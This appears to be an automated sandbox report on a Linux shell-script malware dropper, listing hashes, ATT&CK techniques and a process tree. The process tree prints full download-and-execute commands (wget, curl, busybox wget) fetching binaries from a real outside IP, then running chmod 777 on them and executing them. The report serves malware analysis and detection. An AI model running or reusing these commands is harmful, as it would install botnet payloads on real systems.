Analysis
-
max time kernel
43s -
max time network
46s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 02:29
Static task
static1
Behavioral task
behavioral1
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
-
Size
10KB
-
MD5
abfaa07509a98cf9d61a9ee03366064b
-
SHA1
29b8aa70ebe761df31582b1b62505f786b247305
-
SHA256
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
-
SHA512
f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
-
SSDEEP
192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 845 chmod 869 chmod 734 chmod 755 chmod 801 chmod 820 chmod 839 chmod 786 chmod 863 chmod 690 chmod 720 chmod 857 chmod 831 chmod 851 chmod 875 chmod 674 chmod 684 chmod 705 chmod 767 chmod 773 chmod -
Executes dropped EXE 20 IoCs
ioc pid Process /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 675 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 685 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px 691 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj 706 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc 722 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch 736 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 757 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa 768 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE 774 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo 788 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 802 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 822 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 833 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 840 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 846 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 852 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 858 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 864 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 870 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 877 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 739 wget 745 curl 752 busybox 757 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 758 rm -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo curl File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT curl File opened for modification /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE curl File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj curl File opened for modification /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc curl File opened for modification /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa curl
Processes
-
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh1⤵PID:644
-
/bin/rm/bin/rm bins.sh2⤵PID:648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:671
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:675
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:676
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:678
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:683
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:689
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:692
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:693
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:702
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:706
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:717
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:722
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:724
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:732
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:757
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:759
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:766
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:770
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:772
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:784
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:798
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:817
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:830
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:838
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:844
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:850
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:856
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:862
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:868
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:874
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:880
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97